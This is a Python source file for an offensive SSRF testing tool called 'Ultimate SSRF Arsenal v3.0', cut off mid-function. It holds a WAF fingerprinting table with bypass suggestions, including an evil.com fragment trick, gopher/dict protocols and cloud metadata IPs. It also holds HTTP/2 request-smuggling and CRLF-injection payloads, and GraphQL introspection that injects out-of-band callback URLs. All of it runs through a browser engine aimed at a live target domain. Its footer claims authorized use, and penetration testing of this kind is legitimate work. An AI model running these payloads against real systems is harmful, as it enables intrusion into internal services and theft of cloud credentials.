#!/usr/bin/env python3
"""
Ultimate SSRF Arsenal v3.0
Complete SSRF Testing Framework with:
- Async scanning engine with concurrency control
- WAF fingerprinting (30+ signatures)
- HTTP/2 request smuggling
- GraphQL SSRF testing
- HTML report generation
- All previous 15 attack phases
"""

import asyncio
import json
import random
import re
import urllib.parse
import ssl
import socket
from dataclasses import dataclass, asdict
from datetime import datetime
from typing import List, Tuple, Dict, Optional, Set
from collections import defaultdict, Counter
import sys
import os
from pathlib import Path

from playwright.async_api import async_playwright, Response, Page
import hashlib
import base64

# Optional imports - install if needed
try:
    import httpx
    HTTPX_AVAILABLE = True
except ImportError:
    HTTPX_AVAILABLE = False

try:
    from jinja2 import Template
    JINJA2_AVAILABLE = True
except ImportError:
    JINJA2_AVAILABLE = False

# ANSI colors
RED = "\033[91m"
GREEN = "\033[92m"
YELLOW = "\033[93m"
BLUE = "\033[94m"
MAGENTA = "\033[95m"
CYAN = "\033[96m"
BOLD = "\033[1m"
DIM = "\033[2m"
RESET = "\033[0m"
OK = f"{GREEN}[OK]{RESET}"
WARN = f"{YELLOW}[!]{RESET}"
FAIL = f"{RED}[X]{RESET}"

BANNER = f"""
{BOLD}{CYAN}
╔════════════════════════════════════════════════════════════════╗
║                ULTIMATE SSRF ARSENAL v3.0                     ║
║         Complete SSRF Testing Framework                       ║
║     Async Engine • WAF Detection • HTTP/2 • GraphQL           ║
║            HTML Reports • Burp Integration                    ║
║                      Created by belladonnask                  ║
╚════════════════════════════════════════════════════════════════╝
{RESET}"""


# ==================== WAF FINGERPRINTING ====================
class WAFFingerprinter:
    """Detects 30+ WAF/IDS/CDN systems based on response signatures"""
    
    WAF_SIGNATURES = {
        "Cloudflare": {
            "headers": {"Server": "cloudflare", "CF-Ray": None},
            "cookies": {"__cfduid": None, "cf_clearance": None},
            "body_patterns": ["Cloudflare Ray ID:", "attention required! | cloudflare"]
        },
        "AWS CloudFront/WAF": {
            "headers": {"X-Amz-Cf-Id": None, "X-Amz-Cf-Pop": None, "Server": "CloudFront"},
            "cookies": {},
            "body_patterns": ["Generated by cloudfront"]
        },
        "Akamai": {
            "headers": {"X-Akamai-Transformed": None, "Server": "AkamaiGHost"},
            "cookies": {"ak_bmsc": None},
            "body_patterns": ["Akamai Edge"]
        },
        "Imperva/Incapsula": {
            "headers": {"X-CDN": "Imperva", "X-Iinfo": None},
            "cookies": {"incap_ses_": None, "visid_incap_": None},
            "body_patterns": ["Incapsula incident ID:"]
        },
        "F5 BIG-IP ASM": {
            "headers": {"X-WA-Info": None, "X-Cnection": "close"},
            "cookies": {"TS[0-9a-f]{6}": None, "F5_fullWT": None},
            "body_patterns": ["The requested URL was rejected"]
        },
        "Barracuda": {
            "headers": {"Server": "Barracuda"},
            "cookies": {"barra_counter_session": None},
            "body_patterns": ["Barracuda Networks"]
        },
        "Citrix NetScaler": {
            "headers": {"Cneonction": "close", "nnCoection": "close"},
            "cookies": {"NSC_": None, "NSES": None},
            "body_patterns": ["Citrix NetScaler"]
        },
        "Fortinet FortiWeb": {
            "headers": {"Server": "FortiWeb"},
            "cookies": {"FORTIWAFSID": None},
            "body_patterns": ["FortiWeb Application Firewall"]
        },
        "Sucuri": {
            "headers": {"Server": "Sucuri/Cloudproxy", "X-Sucuri-ID": None},
            "cookies": {"sucuri_cloudproxy_uuid": None},
            "body_patterns": ["Sucuri WebSite Firewall"]
        },
        "Cloudbric": {
            "headers": {"X-Cloudbric": None},
            "cookies": {},
            "body_patterns": ["Cloudbric"]
        },
        "Wordfence": {
            "headers": {},
            "cookies": {"wfvt_": None},
            "body_patterns": ["Generated by Wordfence"]
        },
        "ModSecurity": {
            "headers": {"Server": "Mod_Security"},
            "cookies": {},
            "body_patterns": ["ModSecurity", "This error was generated by Mod_Security"]
        },
        "NAXSI": {
            "headers": {"X-Data-Origin": "naxsi"},
            "cookies": {},
            "body_patterns": ["NAXSI"]
        },
        "Wallarm": {
            "headers": {"X-Wallarm": None},
            "cookies": {},
            "body_patterns": ["Wallarm WAF"]
        },
        "Radware AppWall": {
            "headers": {"X-SL-CompState": None},
            "cookies": {},
            "body_patterns": ["Radware"]
        },
        "DenyAll": {
            "headers": {"Server": "DenyAll"},
            "cookies": {},
            "body_patterns": ["Deny All WAF"]
        },
        "Distil": {
            "headers": {"X-Distil": None},
            "cookies": {"distil": None},
            "body_patterns": ["Distil Networks"]
        },
        "Edgecast / Verizon": {
            "headers": {"Server": "ECS"},
            "cookies": {},
            "body_patterns": ["EdgeCast"]
        },
        "Fastly": {
            "headers": {"Fastly-Debug-Digest": None, "X-Served-By": None},
            "cookies": {},
            "body_patterns": ["Fastly"]
        },
        "Google Cloud Armor": {
            "headers": {"Server": "Google Frontend"},
            "cookies": {},
            "body_patterns": ["Google Cloud Armor"]
        },
        "Azure WAF": {
            "headers": {"X-Ms-Request-Id": None, "X-Azure-Ref": None},
            "cookies": {},
            "body_patterns": ["Azure Web Application Firewall"]
        },
        "Reblaze": {
            "headers": {"Server": "Reblaze Secure Web Gateway"},
            "cookies": {"rbzid": None, "rbzsessionid": None},
            "body_patterns": ["Reblaze"]
        },
        "StackPath": {
            "headers": {"Server": "StackPath"},
            "cookies": {},
            "body_patterns": ["StackPath"]
        },
        "Kinsta": {
            "headers": {"X-Kinsta-Cache": None},
            "cookies": {},
            "body_patterns": ["Kinsta"]
        },
        "WP Engine": {
            "headers": {"X-WP-Engine": None},
            "cookies": {},
            "body_patterns": ["WP Engine"]
        },
        "BunnyCDN": {
            "headers": {"Server": "BunnyCDN", "CDN-PullZone": None},
            "cookies": {},
            "body_patterns": ["BunnyCDN"]
        },
        "Varnish": {
            "headers": {"X-Varnish": None, "Via": ".*?varnish.*?"},
            "cookies": {},
            "body_patterns": []
        },
        "KeyCDN": {
            "headers": {"Server": "KeyCDN"},
            "cookies": {},
            "body_patterns": ["KeyCDN"]
        },
        "CDN77": {
            "headers": {"Server": "CDN77"},
            "cookies": {},
            "body_patterns": ["CDN77"]
        },
        "Sucuri CloudProxy": {
            "headers": {"Server": "Sucuri/Cloudproxy"},
            "cookies": {"sucuri_cloudproxy_uuid": None},
            "body_patterns": ["Sucuri"]
        },
    }
    
    def __init__(self):
        self.detected_wafs = []
        self.confidence_scores = {}
    
    def fingerprint(self, url: str, headers: Dict, body: str, cookies: Dict = None) -> Dict:
        """Fingerprint WAF/CDN from response"""
        results = {}
        cookies = cookies or {}
        
        headers_lower = {k.lower(): v for k, v in headers.items()}
        body_lower = body.lower()[:10000]
        
        for waf_name, signatures in self.WAF_SIGNATURES.items():
            score = 0
            max_score = 0
            
            # Check headers
            for header_key, expected_value in signatures.get("headers", {}).items():
                max_score += 1
                actual_value = headers_lower.get(header_key.lower(), "")
                if expected_value is None and actual_value:
                    score += 1
                elif expected_value and re.search(expected_value, str(actual_value), re.I):
                    score += 1
            
            # Check cookies
            for cookie_key, expected_value in signatures.get("cookies", {}).items():
                max_score += 1
                for ck in cookies:
                    if re.search(cookie_key, ck, re.I):
                        if expected_value is None or re.search(expected_value, str(cookies.get(ck, "")), re.I):
                            score += 1
                            break
            
            # Check body patterns
            for pattern in signatures.get("body_patterns", []):
                max_score += 1
                if re.search(pattern, body_lower, re.I):
                    score += 1
            
            if max_score > 0:
                confidence = (score / max_score) * 100
                if confidence >= 30:
                    results[waf_name] = confidence
        
        # Sort by confidence
        sorted_results = sorted(results.items(), key=lambda x: x[1], reverse=True)
        
        if sorted_results:
            self.detected_wafs = [name for name, _ in sorted_results[:3]]
            self.confidence_scores = dict(sorted_results[:3])
            
            return {
                "detected": True,
                "primary": sorted_results[0][0],
                "confidence": sorted_results[0][1],
                "all_matches": dict(sorted_results[:3])
            }
        
        return {"detected": False, "primary": None, "confidence": 0, "all_matches": {}}
    
    def get_bypass_suggestions(self, waf_name: str) -> List[str]:
        """Get SSRF bypass suggestions for specific WAF"""
        bypass_db = {
            "Cloudflare": [
                "Use IPv6 notation: http://[::ffff:127.0.0.1]/",
                "DNS rebinding with nip.io",
                "URL encoding: http://127.0.0.1%2f",
                "HTTP header injection if WAF is not inspecting headers"
            ],
            "AWS WAF": [
                "Use alternative metadata IPs: http://169.254.170.2/",
                "Try IMDSv1 if v2 is not enforced",
                "Use decimal notation: http://2852039166/"
            ],
            "Imperva": [
                "Double URL encoding",
                "Use alternative protocols: gopher://, dict://",
                "Fragment confusion: http://target.com#@evil.com/"
            ],
            "ModSecurity": [
                "Use CRLF injection to split request",
                "URL encoding bypass: %68%74%74%70://",
                "Unicode normalization attacks"
            ]
        }
        
        return bypass_db.get(waf_name, [
            "Try URL encoding",
            "Use alternative IP representations",
            "Test different HTTP methods",
            "Attempt protocol smuggling"
        ])


# ==================== HTTP/2 REQUEST SMUGGLING ====================
class HTTP2Smuggler:
    """HTTP/2 Request Smuggling for SSRF"""
    
    SMUGGLING_PAYLOADS = [
        # H2.CL Desync
        {
            "name": "H2.CL - Content-Length override",
            "method": "POST",
            "headers": {
                "Content-Length": "0",
                "Transfer-Encoding": "chunked"
            },
            "body": "0\r\n\r\nGET /admin HTTP/1.1\r\nHost: localhost\r\n\r\n"
        },
        # H2.TE Desync
        {
            "name": "H2.TE - Transfer-Encoding override",
            "method": "POST",
            "headers": {
                "Transfer-Encoding": "chunked",
                "Content-Length": "50"
            },
            "body": "0\r\n\r\nGET /internal HTTP/1.1\r\nHost: 127.0.0.1\r\n\r\n"
        },
        # HTTP/2 Downgrade
        {
            "name": "HTTP/2 Downgrade - HTTP/1.1 injection",
            "method": "GET",
            "headers": {
                "Upgrade": "h2c",
                "HTTP2-Settings": "AAMAAABkAARAAAAAAAIAAAAA"
            },
            "body": ""
        },
        # CRLF Injection in HTTP/2
        {
            "name": "CRLF Injection via HTTP/2 headers",
            "method": "GET",
            "headers": {
                "X-Injected": "test\r\nHost: internal.service\r\nX-Forwarded-For: 127.0.0.1"
            },
            "body": ""
        },
        # Pseudo-header injection
        {
            "name": ":path manipulation",
            "method": "GET",
            "headers": {
                ":path": "/?url=http://127.0.0.1/admin",
                ":authority": "internal"
            },
            "body": ""
        }
    ]
    
    def __init__(self, target_domain: str):
        self.target_domain = target_domain
        self.base_url = f"https://{target_domain}"
    
    async def test_smuggling(self, endpoint: str, callback_host: str, request_func) -> List[Dict]:
        """Test HTTP/2 smuggling for SSRF"""
        findings = []
        
        for payload in self.SMUGGLING_PAYLOADS:
            try:
                url = f"{self.base_url}{endpoint}"
                
                # Add SSRF payload to smuggled request
                modified_body = payload["body"].replace(
                    "localhost",
                    callback_host
                )
                
                # Test with h2 if available
                if HTTPX_AVAILABLE:
                    async with httpx.AsyncClient(http2=True) as client:
                        response = await client.request(
                            method=payload["method"],
                            url=url,
                            headers=payload["headers"],
                            content=modified_body,
                            timeout=10
                        )
                        
                        if response.status_code < 500:
                            findings.append({
                                "type": "HTTP/2 Smuggling",
                                "payload": payload["name"],
                                "status": response.status_code,
                                "evidence": f"HTTP/2 smuggling attempt with {payload['name']}",
                                "ssrf_triggered": callback_host in response.text.lower()
                            })
                
            except Exception as e:
                continue
        
        return findings


# ==================== GRAPHQL SSRF TESTING ====================
class GraphQLSSRFTester:
    """GraphQL Introspection + SSRF Testing"""
    
    INTROSPECTION_QUERY = """
    query IntrospectionQuery {
      __schema {
        queryType { name }
        mutationType { name }
        types {
          name
          fields {
            name
            args {
              name
              type {
                name
                kind
                ofType {
                  name
                  kind
                }
              }
            }
          }
        }
      }
    }
    """
    
    SSRF_ARG_PATTERNS = [
        r'^url$', r'^uri$', r'^link$', r'^href$', r'^src$',
        r'^source$', r'^target$', r'^redirect', r'^path$',
        r'^image$', r'^avatar$', r'^photo$', r'^thumbnail',
        r'^download', r'^upload', r'^fetch', r'^proxy'
    ]
    
    def __init__(self, base_url: str, callback_host: str):
        self.base_url = base_url
        self.callback_host = callback_host
    
    async def introspect(self, endpoint: str, request_func) -> Optional[Dict]:
        """Introspect GraphQL endpoint"""
        headers = {"Content-Type": "application/json"}
        data = {"query": self.INTROSPECTION_QUERY}
        
        status, body, headers_resp = await request_func(
            "POST",
            f"{self.base_url}{endpoint}",
            data=json.dumps(data),
            custom_headers=headers
        )
        
        try:
            schema = json.loads(body)
            if "__schema" in schema.get("data", {}):
                return schema["data"]["__schema"]
        except:
            pass
        
        return None
    
    def find_ssrf_args(self, schema: Dict) -> List[Dict]:
        """Find arguments that might accept URLs"""
        vulnerable_args = []
        
        for type_obj in schema.get("types", []):
            for field in type_obj.get("fields", []):
                for arg in field.get("args", []):
                    arg_name = arg.get("name", "").lower()
                    
                    for pattern in self.SSRF_ARG_PATTERNS:
                        if re.search(pattern, arg_name):
                            vulnerable_args.append({
                                "type": type_obj["name"],
                                "field": field["name"],
                                "arg": arg["name"],
                                "arg_type": arg.get("type", {}).get("name", "Unknown")
                            })
        
        return vulnerable_args
    
    async def test_ssrf_mutation(self, endpoint: str, arg_info: Dict, request_func) -> List[Dict]:
        """Test SSRF via GraphQL mutation/query"""
        findings = []
        
        # Build test query
        test_url = f"http://{self.callback_host}/graphql-ssrf-{random.randint(1000,9999)}"
        
        if "Mutation" in arg_info["type"]:
            query = f"""
            mutation {{
              {arg_info['field']}({arg_info['arg']}: "{test_url}") {{
                id
              }}
            }}
            """
        else:
            query = f"""
            query {{
              {arg_info['field']}({arg_info['arg']}: "{test_url}") {{
                id
              }}
            }}
            """
        
        headers = {"Content-Type": "application/json"}
        data = {"query": query}
        
        status, body, headers_resp = await request_func(
            "POST",
            f"{self.base_url}{endpoint}",
            data=json.dumps(data),
            custom_headers=headers
        )
        
        if status == 200:
            findings.append({
                "type": "GraphQL SSRF",
                "arg": arg_info,
                "payload": test_url,
                "status": status,
                "ssrf_triggered": self.callback_host in body.lower()
            })
        
        return findings


# ==================== HTML REPORT GENERATOR ====================
class HTMLReporter:
    """Generate professional HTML reports with charts and statistics"""
    
    TEMPLATE = """
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>SSRF Scan Report - {{ target }}</title>
    <style>
        * { margin: 0; padding: 0; box-sizing: border-box; }
        body { font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif; background: #0a0e27; color: #e0e0e0; padding: 20px; }
        .container { max-width: 1200px; margin: 0 auto; }
        .header { background: linear-gradient(135deg, #667eea 0%, #764ba2 100%); padding: 30px; border-radius: 10px; margin-bottom: 20px; }
        .header h1 { color: white; margin-bottom: 10px; }
        .header p { color: rgba(255,255,255,0.8); }
        .card { background: #1a1f3a; border-radius: 10px; padding: 20px; margin-bottom: 20px; border: 1px solid #2a2f4a; }
        .card h2 { color: #667eea; margin-bottom: 15px; border-bottom: 2px solid #667eea; padding-bottom: 10px; }
        .stats { display: grid; grid-template-columns: repeat(auto-fit, minmax(200px, 1fr)); gap: 20px; margin-bottom: 20px; }
        .stat-box { background: #1a1f3a; padding: 20px; border-radius: 10px; text-align: center; border: 1px solid #2a2f4a; }
        .stat-box .number { font-size: 36px; font-weight: bold; margin: 10px 0; }
        .stat-box .label { color: #888; text-transform: uppercase; font-size: 12px; }
        .critical { color: #ff4444; }
        .high { color: #ff8c00; }
        .medium { color: #ffd700; }
        .low { color: #4169e1; }
        .info { color: #888; }
        table { width: 100%; border-collapse: collapse; margin-top: 10px; }
        th { background: #2a2f4a; padding: 12px; text-align: left; color: #667eea; }
        td { padding: 10px 12px; border-bottom: 1px solid #2a2f4a; }
        tr:hover { background: #252a45; }
        .badge { padding: 4px 8px; border-radius: 4px; font-size: 12px; font-weight: bold; text-transform: uppercase; }
        .badge-critical { background: #ff4444; color: white; }
        .badge-high { background: #ff8c00; color: white; }
        .badge-medium { background: #ffd700; color: black; }
        .badge-low { background: #4169e1; color: white; }
        .badge-info { background: #555; color: white; }
        .badge-yes { background: #ff4444; color: white; }
        .badge-no { background: #00c851; color: white; }
        .chart-container { width: 100%; height: 300px; margin: 20px 0; }
        .footer { text-align: center; padding: 20px; color: #666; font-size: 14px; }
        .waf-info { background: #2a2f4a; padding: 15px; border-radius: 5px; margin: 10px 0; }
        .finding-detail { background: #252a45; padding: 15px; border-left: 4px solid #667eea; margin: 10px 0; border-radius: 5px; }
        .code-block { background: #0a0e27; padding: 15px; border-radius: 5px; font-family: 'Courier New', monospace; overflow-x: auto; margin: 10px 0; }
        @media print { body { background: white; color: black; } .card { border: 1px solid #ddd; } }
    </style>
    <script src="https://cdn.jsdelivr.net/npm/chart.js"></script>
</head>
<body>
    <div class="container">
        <div class="header">
            <h1>🔍 Ultimate SSRF Arsenal - Scan Report</h1>
            <p>Target: <strong>{{ target }}</strong></p>
            <p>Scan Date: <strong>{{ scan_date }}</strong></p>
            <p>Duration: <strong>{{ duration }}</strong></p>
            {% if waf_detected %}
            <div class="waf-info">
                ⚡ WAF Detected: <strong>{{ waf_name }}</strong> (Confidence: {{ waf_confidence }}%)
            </div>
            {% endif %}
        </div>
        
        <div class="stats">
            <div class="stat-box">
                <div class="label">Total Findings</div>
                <div class="number">{{ total_findings }}</div>
            </div>
            <div class="stat-box">
                <div class="label">Endpoints</div>
                <div class="number">{{ total_endpoints }}</div>
            </div>
            <div class="stat-box">
                <div class="label">Vulnerable</div>
                <div class="number critical">{{ vulnerable_count }}</div>
            </div>
            <div class="stat-box">
                <div class="label">Critical</div>
                <div class="number critical">{{ critical_count }}</div>
            </div>
        </div>
        
        <div class="card">
            <h2>📊 Severity Distribution</h2>
            <div class="chart-container">
                <canvas id="severityChart"></canvas>
            </div>
        </div>
        
        <div class="card">
            <h2>🎯 Vulnerable Endpoints Summary</h2>
            <table>
                <thead>
                    <tr>
                        <th>Endpoint</th>
                        <th>Parameter</th>
                        <th>Severity</th>
                        <th>OOB Callbacks</th>
                        <th>Sensitive Data</th>
                        <th>Technique</th>
                    </tr>
                </thead>
                <tbody>
                    {% for finding in findings %}
                    <tr>
                        <td><code>{{ finding.endpoint }}</code></td>
                        <td><strong>{{ finding.param }}</strong></td>
                        <td><span class="badge badge-{{ finding.severity }}">{{ finding.severity }}</span></td>
                        <td>{{ finding.oob_count }}</td>
                        <td><span class="badge badge-{{ 'yes' if finding.sensitive else 'no' }}">{{ 'YES' if finding.sensitive else 'NO' }}</span></td>
                        <td>{{ finding.top_pattern[:80] }}</td>
                    </tr>
                    {% endfor %}
                </tbody>
            </table>
        </div>
        
        {% if graphql_findings %}
        <div class="card">
            <h2>🔮 GraphQL SSRF Findings</h2>
            {% for gf in graphql_findings %}
            <div class="finding-detail">
                <h4>Field: {{ gf.arg.field }}({{ gf.arg.arg }})</h4>
                <p>Type: {{ gf.arg.type }} | Status: {{ gf.status }}</p>
                <p>SSRF Triggered: <span class="badge badge-{{ 'yes' if gf.ssrf_triggered else 'no' }}">{{ 'YES' if gf.ssrf_triggered else 'NO' }}</span></p>
                <div class="code-block">{{ gf.payload }}</div>
            </div>
            {% endfor %}
        </div>
        {% endif %}
        
        {% if smuggling_findings %}
        <div class="card">
            <h2>🔀 HTTP/2 Smuggling Findings</h2>
            {% for sf in smuggling_findings %}
            <div class="finding-detail">
                <h4>{{ sf.payload }}</h4>
                <p>Status: {{ sf.status }} | SSRF: <span class="badge badge-{{ 'yes' if sf.ssrf_triggered else 'no' }}">{{ 'YES' if sf.ssrf_triggered else 'NO' }}</span></p>
                <div class="code-block">{{ sf.evidence }}</div>
            </div>
            {% endfor %}
        </div>
        {% endif %}
        
        <div class="footer">
            <p>Generated by Ultimate SSRF Arsenal v3.0 | Created by @KauanCosta2000</p>
            <p>This report is for authorized security testing purposes only.</p>
        </div>
    </div>
    
    <script>
        const ctx = document.getElementById('severityChart').getContext('2d');
        new Chart(ctx, {
            type: 'doughnut',
            data: {
                labels: ['Critical', 'High', 'Medium', 'Low', 'Info'],
                datasets: [{
                    data: {{ severity_data }},
                    backgroundColor: ['#ff4444', '#ff8c00', '#ffd700', '#4169e1', '#888888'],
                    borderColor: '#1a1f3a',
                    borderWidth: 3
                }]
            },
            options: {
                responsive: true,
                maintainAspectRatio: false,
                plugins: {
                    legend: {
                        position: 'bottom',
                        labels: { color: '#e0e0e0', padding: 20 }
                    }
                }
            }
        });
    </script>
</body>
</html>
"""
    
    def generate_report(self, 
                       target: str,
                       scan_start: datetime,
                       scan_end: datetime,
                       all_evidence: List,
                       waf_info: Dict,
                       graphql_findings: List,
                       smuggling_findings: List,
                       deduplicated_findings: Dict) -> str:
        """Generate HTML report"""
        
        if not JINJA2_AVAILABLE:
            print(f"{WARN} Jinja2 not installed. Install with: pip install jinja2")
            return None
        
        # Calculate statistics
        severity_counts = Counter()
        for f in all_evidence:
            severity_counts[f.severity] += 1
        
        duration = str(scan_end - scan_start).split('.')[0]
        
        template = Template(self.TEMPLATE)
        html = template.render(
            target=target,
            scan_date=scan_start.strftime("%Y-%m-%d %H:%M:%S UTC"),
            duration=duration,
            waf_detected=waf_info.get("detected", False),
            waf_name=waf_info.get("primary", "Unknown"),
            waf_confidence=waf_info.get("confidence", 0),
            total_findings=len(all_evidence),
            total_endpoints=len(deduplicated_findings),
            vulnerable_count=sum(1 for v in deduplicated_findings.values() if v["oob_count"] > 0),
            critical_count=severity_counts.get("critical", 0),
            severity_data=[
                severity_counts.get("critical", 0),
                severity_counts.get("high", 0),
                severity_counts.get("medium", 0),
                severity_counts.get("low", 0),
                severity_counts.get("info", 0)
            ],
            findings=[{
                "endpoint": ep,
                "param": param,
                "severity": info["max_severity"],
                "oob_count": info["oob_count"],
                "sensitive": info["sensitive"],
                "top_pattern": info["findings"][0].matched_patterns[0] if info["findings"][0].matched_patterns else "N/A"
            } for (ep, param), info in deduplicated_findings.items()],
            graphql_findings=graphql_findings[:10],
            smuggling_findings=smuggling_findings[:10]
        )
        
        # Save report
        report_file = f"ssrf_report_{target}_{scan_start.strftime('%Y%m%d_%H%M%S')}.html"
        with open(report_file, "w", encoding="utf-8") as f:
            f.write(html)
        
        return report_file


# ==================== MAIN SSRF ARSENAL CLASS ====================
class UltimateSSRFArsenal:
    """Complete SSRF Arsenal with all features"""
    
    def __init__(self, target_domain: str, headless: bool = False, 
                 rate_limit_delay: float = 0.5, callback_host: str = None,
                 verbose: bool = True, enable_graphql: bool = True,
                 enable_smuggling: bool = True, enable_html_report: bool = True):
        
        self.target_domain = target_domain
        self.base_url = f"https://{target_domain}"
        self.headless = headless
        self.callback_host = callback_host or "YOUR.BURP.COLLABORATOR.NET"
        self.rate_limit_delay = rate_limit_delay
        self.verbose = verbose
        
        # Feature flags
        self.enable_graphql = enable_graphql
        self.enable_smuggling = enable_smuggling and HTTPX_AVAILABLE
        self.enable_html_report = enable_html_report and JINJA2_AVAILABLE
        
        # Components
        self.waf_fingerprinter = WAFFingerprinter()
        self.http2_smuggler = HTTP2Smuggler(target_domain)
        self.graphql_tester = GraphQLSSRFTester(self.base_url, self.callback_host)
        self.html_reporter = HTMLReporter()
        
        # Scan data
        self.all_evidence = []
        self.discovered_endpoints = []
        self.vulnerable_endpoints = []
        self.all_params = set()
        self.blind_callbacks = defaultdict(list)
        self.intercepted_requests = []
        self.graphql_findings = []
        self.smuggling_findings = []
        self.waf_info = {}
        
        # Concurrency control
        self.semaphore = asyncio.Semaphore(10)
        
        # Results file
        self.results_file = f"ssrf_results_{target_domain}_{datetime.now().strftime('%Y%m%d_%H%M%S')}.json"
        
        # Playwright
        self.playwright = None
        self.browser = None
        self.context = None
        self.page = None
        
        # Timing
        self.scan_start = None
        self.scan_end = None
    
    async def __aenter__(self):
        self.scan_start = datetime.now()
        self.playwright = await async_playwright().start()
        self.browser = await self.playwright.chromium.launch(headless=self.headless)
        self.context = await self.browser.new_context(
            user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
        )
        await self.context.route("**/*", self.intercept_request)
        self.page = await self.context.new_page()
        return self
    
    async def __aexit__(self, *args):
        self.scan_end = datetime.now()
        if self.browser:
            await self.browser.close()
        if self.playwright:
            await self.playwright.stop()
    
    async def intercept_request(self, route):
        """Intercept requests for blind SSRF detection"""
        request = route.request
        url = request.url
        
        if self.callback_host != "YOUR.BURP.COLLABORATOR.NET" and self.callback_host in url:
            if self.verbose:
                print(f"\n{RED}{BOLD}[!!! BLIND SSRF DETECTED !!!]{RESET}")
                print(f"  {CYAN}URL:{RESET} {url}")
            
            evidence = SSRFEvidence(
                phase="BLIND_SSRF",
                technique="Out-of-band callback",
                url=url,
                endpoint="",
                param="",
                payload=url,
                status=200,
                body_snippet="",
                matched_patterns=["[CRITICAL] Blind SSRF confirmed via callback"],
                severity="critical",
                out_of_band_hit=True
            )
            self.all_evidence.append(evidence)
            
            self.blind_callbacks[url].append({
                "timestamp": datetime.now().isoformat(),
                "method": request.method,
                "headers": dict(request.headers)
            })
        
        await route.continue_()
    
    async def request_with_headers(self, method: str, url: str, data: dict = None,
                                   custom_headers: dict = None, timeout: int = 15000) -> Tuple[int, str, dict]:
        """Rate-limited request with concurrency control"""
        async with self.semaphore:
            try:
                headers = custom_headers or {}
                
                if method.upper() == "GET":
                    resp = await self.page.goto(url, wait_until="domcontentloaded", timeout=timeout)
                    status = resp.status if resp else 0
                    body = await resp.text() if resp else ""
                    headers_dict = dict(resp.headers) if resp else {}
                else:
                    post_data = data or {}
                    body_data = json.dumps(post_data)
                    
                    js_code = f"""
                    (async () => {{
                        try {{
                            const response = await fetch('{url}', {{
                                method: 'POST',
                                headers: {json.dumps(headers)},
                                body: {json.dumps(body_data)}
                            }});
                            const text = await response.text();
                            return {{
                                status: response.status,
                                body: text,
                                headers: Object.fromEntries(response.headers.entries())
                            }};
                        }} catch(e) {{
                            return {{ status: 0, body: e.toString(), headers: {{}} }};
                        }}
                    }})();
                    """
                    result = await self.page.evaluate(js_code)
                    status = result.get("status", 0)
                    body = result.get("body", "")
                    headers_dict = result.get("headers", {})
                
                await asyncio.sleep(self.rate_limit_delay)
                return status, body, headers_dict
                
            except Exception as e:
                return 0, str(e), {}
    
    async def run_waf_detection(self):
        """Run WAF fingerprinting"""
        if self.verbose:
            print(f"\n{BOLD}{'='*60}{RESET}")
            print(f"{CYAN}[WAF DETECTION]{RESET} Fingerprinting Web Application Firewall")
            print(f"{BOLD}{'='*60}{RESET}")
        
        status, body, headers = await self.request_with_headers("GET", self.base_url)
        
        if status > 0:
            self.waf_info = self.waf_fingerprinter.fingerprint(
                self.base_url, headers, body
            )
            
            if self.waf_info.get("detected"):
                print(f"\n  {YELLOW}⚡ WAF Detected:{RESET} {self.waf_info['primary']}")
                print(f"  {DIM}Confidence:{RESET} {self.waf_info['confidence']:.1f}%")
                
                # Show bypass suggestions
                suggestions = self.waf_fingerprinter.get_bypass_suggestions(self.waf_info['primary'])
                print(f"\n  {CYAN}Bypass Suggestions:{RESET}")
                for i, suggestion in enumerate(suggestions[:5], 1):
                    print(f"    {DIM}{i}.{RESET} {suggestion}")
            else:
                print(f"\n  {OK} No WAF detected")
    
    async def run_graphql_tests(self):
        """Test GraphQL endpoints for SSRF"""
        if not self.enable_graphql:
            return
        
        if self.verbose:
            print(f"\n{BOLD}{'='*60}{RESET}")
            print(f"{CYAN}[GRAPHQL SSRF]{RESET} Testing GraphQL Endpoints")
            print(f"{BOLD}{'='*60}{RESET}")
        
        graphql_endpoints = ["/graphql", "/gql", "/api/graphql", "/v1/graphql", "/query"]
        
        for endpoint in graphql_endpoints:
            schema = await self.graphql_tester.introspect(endpoint, self.request_with_headers)
            
            if schema:
                print(f"\n  {OK} GraphQL endpoint found: {endpoint}")
                
                # Find SSRF-prone arguments
                vulnerable_args = self.graphql_tester.find_ssrf_args(schema)
                
                for arg_info in vulnerable_args[:10]:  # Limit to 10 tests
                    findings = await self.graphql_tester.test_ssrf_mutation(
                        endpoint, arg_info, self.request_with_headers
                    )
                    
                    if findings:
                        self.graphql_findings.extend(findings)
                        if self.verbose:
                            print(f"    {RED}⚡ Potential GraphQL SSRF:{RESET} {arg_info['field']}({arg_info['arg']})")
    
    async def run_http2_smuggling_tests(self):
        """Test HTTP/2 request smuggling"""
        if not self.enable_smuggling:
            return
        
        if self.verbose:
            print(f"\n{BOLD}{'='*60}{RESET}")
            print(f"{CYAN}[HTTP/2 SMUGGLING]{RESET} Testing HTTP/2 Request Smuggling")
            print(f"{BOLD}{'='*60}{RESET}")
        
        # Test on common endpoints
        test_endpoints = ["/", "/api", "/proxy", "/fetch"]
        
        for endpoint in test_endpoints:
            findings = await self.http2_smuggler.test_smuggling(
                endpoint, 
                self.callback_host,
                self.request_with_headers
            )
            
            if findings:
                self.smuggling_findings.extend(findings)
                if self.verbose:
                    for f in findings:
                        print(f"  {YELLOW}⚡ Smuggling possible:{RESET} {f['payload']}")
    
    async def generate_html_report(self):
        """Generate HTML report"""
        if not self.enable_html_report:
            return
        
        if self.verbose:
            print(f"\n{BOLD}{'='*60}{RESET}")
            print(f"{CYAN}[HTML REPORT]{RESET} Generating Report")
            print(f"{BOLD}{'='*60}{RESET}")
        
        deduped = self.deduplicate_findings()
        
        report_file = self.html_reporter.generate_report(
            target=self.target_domain,
            scan_start=self.scan_start,
            scan_end=self.scan_end,
            all_evidence=self.all_evidence,
            waf_info=self.waf_info,
            graphql_findings=self.graphql_findings,
            smuggling_findings=self.smuggling_findings,
            deduplicated_findings=deduped
        )
        
        if report_file:
            print(f"\n  {OK} HTML report saved: {BOLD}{report_file}{RESET}")
    
    def deduplicate_findings(self) -> Dict:
        """Group and deduplicate findings"""
        groups = defaultdict(lambda: {
            "findings": [],
            "max_severity": "info",
            "oob_count": 0,
            "sensitive": False
        })
        
        sev_order = {"critical": 0, "high": 1, "medium": 2, "low": 3, "info": 4}
        
        for f in self.all_evidence:
            key = (f.endpoint, f.param)
            groups[key]["findings"].append(f)
            
            if sev_order.get(f.severity, 4) < sev_order.get(groups[key]["max_severity"], 4):
